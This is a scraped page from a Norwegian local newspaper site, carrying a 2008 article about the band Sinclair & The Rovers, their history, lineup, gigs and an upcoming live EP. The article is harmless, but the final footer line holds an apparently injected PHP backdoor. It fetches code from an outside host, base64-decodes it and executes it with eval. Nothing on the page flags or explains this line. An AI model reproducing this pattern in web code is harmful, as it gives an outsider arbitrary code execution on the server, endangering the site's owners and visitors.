Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Live-EP fra Sinclair & The Rovers
Skrevet av Harald Halvorsen   
mandag 27. oktober 2008

Sinclair & the Rovers er snart klar med utgivelse nummer to, etter ti år som band. Det høres kanskje ikke ut som så veldig mye, med tanke på andre band, men de sitter ikke akkurat på latsiden selv om de ikke spyr ut en plate hvert år.

Sinclair & The Rovers
Foto: Emile Ashley

Bandet sier selv at de er et liveband (nytes gjerne i forbindelse med alkohol), og sliter med å finne tid til innspilling. De har tilgang til Aaron Records sitt studio, men tendenserer til å bli sittende utenfor studio i en eneste lang kaffe- og røykepause.

Historien går noe i disse baner: Kyrre “Sinclair” Saupstad trengte et band til å synge noen irske drikkeviser på en fest for ti år siden. Nå har festen vart i ti år, og for å sitere bandet selv - “det tok litt av”.

De har hatt flere spillejobber enn de fleste. Den Norske Torskeklubben i Chicago, hvor de fikk servert utmerket flybåren islandsk torsk kan kanskje nevnes spesielt, i tillegg til jobben ombord på reketråleren “Rokkflu”. Men Englandsbåten takket de nei til...

Musikken beskriver bandet selv som “mye forskjellig”, men så lenge det låter “sinclairsk” og muligens har en dråpe irsk i seg, så “er det vår greie” sier Sigve, som er vokalist i bandet sammen med Mariann. De har spilt det meste av irske standardviser, men har kanskje blitt mer rocka i årenes løp. I tillegg til to vokalister har bandet gitarer og munnspill som trakteres av Kenneth. Jonny tar seg av tangentene på piano og trekkspill. Trompet, banjo og mandolin tar Ole seg av. Gunnar spiller fløyter og feler, Arne trommer, cymbaler og irsk bodhran, mens Knut Helge står for de mørkeste tonene på bassgitar og tuba. Alt dette pakkes inn i bilen(e) når roverne er på tur.

Og tur blir det endel av. I vinter blir det bl.a. spilling på Rauland Høgfjellshotell, men for de som ikke ser logikken i å oppsøke snøen frivillig så kan vi rapportere om at julen skal svinges inn med sinclairske toner på puben “Only One” på Klepp siste helgen før jul. Releaseparty blir det selvsagt også. Problemet er bare å få tid mellom all reisingen. Bandet har satt opp senest 7. februar på Irsk Aften i Sekkelageret på Bryne, så får vi bare følge med hva som skjer på den fronten.

Sinclair & the Rovers har som sagt én utgivelse bak seg. Dette er en studio-EP ved navn “Rocky Road” og det rapporteres om bra salg på Unkarsfestivalen. Denne platen er å få tak i på Ivar Skei i Sandnes, og der vil man mest sannsynlig finne den kommende plata også. De har også med seg sin internasjonale salgssjef når de er på veien, så hvis du ikke bor i nærheten av Ivar Skei så er dette dama du skal finne på konsertene. Ellers er det bare å følge med på bandets webside, rovers.no for oppdateringer på konsertfronten, dato for plateslipp osv.

 

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));